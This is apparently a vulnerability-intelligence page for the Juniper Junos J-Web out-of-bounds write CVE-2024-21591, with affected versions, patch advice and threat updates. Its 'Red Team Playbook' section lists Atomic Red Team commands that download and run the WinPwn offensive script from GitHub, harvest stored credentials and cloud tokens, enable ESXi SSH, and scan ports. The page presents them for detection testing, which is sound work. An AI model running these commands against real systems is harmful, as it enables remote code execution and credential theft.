CVE-2024-21591
Overview
This vulnerability is an out-of-bounds write in the J-Web management interface of Juniper Networks Junos OS running on SRX and EX Series devices. It arises from the use of an insecure function that allows arbitrary memory overwrite due to improper bounds checking. The flaw resides specifically within the J-Web component responsible for web-based device management.
Vulnerability Description
An Out-of-bounds Write vulnerability in J-Web of Juniper Networks Junos OS on SRX Series and EX Series allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS), or Remote Code Execution (RCE) and obtain root privileges on the device. This issue is caused by use of an insecure function allowing an attacker to overwrite arbitrary memory. This issue affects Juniper Networks Junos OS SRX Series and EX Series: * Junos OS versions earlier than 20.4R3-S9; * Junos OS 21.2 versions earlier than 21.2R3-S7; * Junos OS 21.3 versions earlier than 21.3R3-S5; * Junos OS 21.4 versions earlier than 21.4R3-S5; * Junos OS 22.1 versions earlier than 22.1R3-S4; * Junos OS 22.2 versions earlier than 22.2R3-S3; * Junos OS 22.3 versions earlier than 22.3R3-S2; * Junos OS 22.4 versions earlier than 22.4R2-S2, 22.4R3.
Impact
An attacker with network access and no authentication can exploit this vulnerability to cause a denial of service or execute arbitrary code with root privileges on affected devices. This enables full system compromise, potentially disrupting network operations or allowing lateral movement within the environment. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms that exploitation requires only network access without any privileges or user interaction.
Solution
Juniper Networks has released patches addressing this vulnerability in Junos OS versions 20.4R3-S9, 21.2R3-S7, 21.3R3-S5, 21.4R3-S5, 22.1R3-S4, 22.2R3-S3, 22.3R3-S2, and 22.4R2-S2/22.4R3 for SRX and EX Series devices. Administrators should apply these updates as detailed in Juniper advisory JSA75729 (https://supportportal.juniper.net/JSA75729). No specific workarounds are noted in the advisory.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Juniper Networks' J-Web interface for Junos OS on SRX and EX Series devices is characterized as an out-of-bounds write issue. This type of vulnerability occurs when a program writes data outside the boundaries of allocated memory, which can lead to unintended behavior, including memory corruption. In this case, the insecure function utilized within the J-Web interface allows an unauthenticated attacker to overwrite arbitrary memory locations. This flaw can potentially lead to severe consequences, such as remote code execution (RCE) and the ability to gain root privileges on the affected devices. The implications of this vulnerability are particularly concerning given the critical role that network devices play in managing and securing enterprise environments.
Attack vectors for this vulnerability are primarily network-based, allowing an attacker to exploit the flaw without needing physical access to the device. An attacker could craft specially designed requests targeting the J-Web interface, which, if successful, would trigger the out-of-bounds write condition. This exploitation could lead to a denial of service (DoS), rendering the device inoperable, or worse, allow the attacker to execute arbitrary code with elevated privileges. The ability to gain root access means that an attacker could manipulate the device's configuration, intercept or redirect network traffic, or deploy additional malicious payloads, significantly escalating the threat level.
The real-world impact of this vulnerability is substantial, particularly for organizations relying on Juniper's SRX and EX Series devices for their network infrastructure. The high CVSS score of 9.8 indicates critical severity, suggesting that successful exploitation could lead to catastrophic outcomes, including data breaches, service interruptions, and significant financial losses. Businesses may face regulatory repercussions if sensitive data is compromised or if they fail to protect their networks adequately. Additionally, the reputational damage resulting from such incidents can have long-lasting effects on customer trust and brand integrity.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating Junos OS to the latest versions that address this vulnerability is crucial. Network administrators should also employ intrusion detection systems (IDS) to monitor for unusual traffic patterns or attempts to access the J-Web interface. Conducting vulnerability assessments and penetration testing can help identify potential weaknesses in the network infrastructure. Furthermore, implementing strict access controls and network segmentation can limit the exposure of critical devices to unauthorized access, thereby reducing the risk of exploitation.
In conclusion, the out-of-bounds write vulnerability in Junos OS presents a significant threat to network security. Given the potential for remote code execution and the ability to disrupt services, organizations must prioritize the identification and remediation of this issue. By adopting proactive security measures, including timely updates, continuous monitoring, and robust access controls, businesses can mitigate the risks associated with this vulnerability and strengthen their overall cybersecurity posture.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2024-21591, with our telemetry indicating a recent emergence of exploit attempts targeting vulnerable Junos OS SRX and EX Series devices. Although no new technical exploit details have surfaced, the uptick in network-based probing and potential exploitation attempts underscores an increased adversary interest in leveraging this critical out-of-bounds write vulnerability. This heightened activity signals a shift from theoretical risk to active reconnaissance and exploitation phases, elevating the operational threat landscape for affected organizations. While the EPSS score remains stable, the surge in observed attack patterns suggests that threat actors are refining or deploying capabilities to exploit this flaw, thereby increasing the likelihood of successful compromise. Consequently, defenders should regard the risk level as elevated, reflecting a transition toward more frequent and targeted malicious activity exploiting this vulnerability.
Update 2 — July 19, 2026
CSURFACE threat intelligence has identified a marked escalation in reconnaissance and exploitation attempts targeting CVE-2024-21591, reflecting a broader shift toward active operational use of this vulnerability. Our telemetry indicates that threat actors are increasingly probing affected Juniper Networks Junos OS devices, with attack patterns suggesting refinement of exploitation techniques. Although no new exploit variants or proof-of-concept code have surfaced, the intensified activity underscores a growing adversary focus on this critical flaw. This evolution elevates the threat posture for organizations running vulnerable SRX and EX Series devices, as the likelihood of successful compromise rises alongside attacker engagement. Consequently, the risk level should be considered heightened, emphasizing the need for vigilant monitoring despite the stable EPSS score.
Affected Products (90)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Juniper | Junos | All |
cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:-:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r1-s1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r2:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r2-s1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r2-s2:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3-s1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3-s2:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3-s3:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3-s4:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3-s5:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3-s6:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3-s7:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3-s8:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.2 |
cpe:2.3:o:juniper:junos:21.2:-:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.2 |
cpe:2.3:o:juniper:junos:21.2:r1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.2 |
cpe:2.3:o:juniper:junos:21.2:r1-s1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.2 |
cpe:2.3:o:juniper:junos:21.2:r1-s2:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-21591 |
| supportportal.juniper.net |
GitHub CVE
vendor-advisory
|
https://supportportal.juniper.net/JSA75729 |
| first.org |
GitHub CVE
technical-description
|
https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
| curesec.com |
GitHub CVE
third-party-advisory
|
https://curesec.com/blog/article/CVE-2024-21591_Juniper_Remote_Code_Exec.html |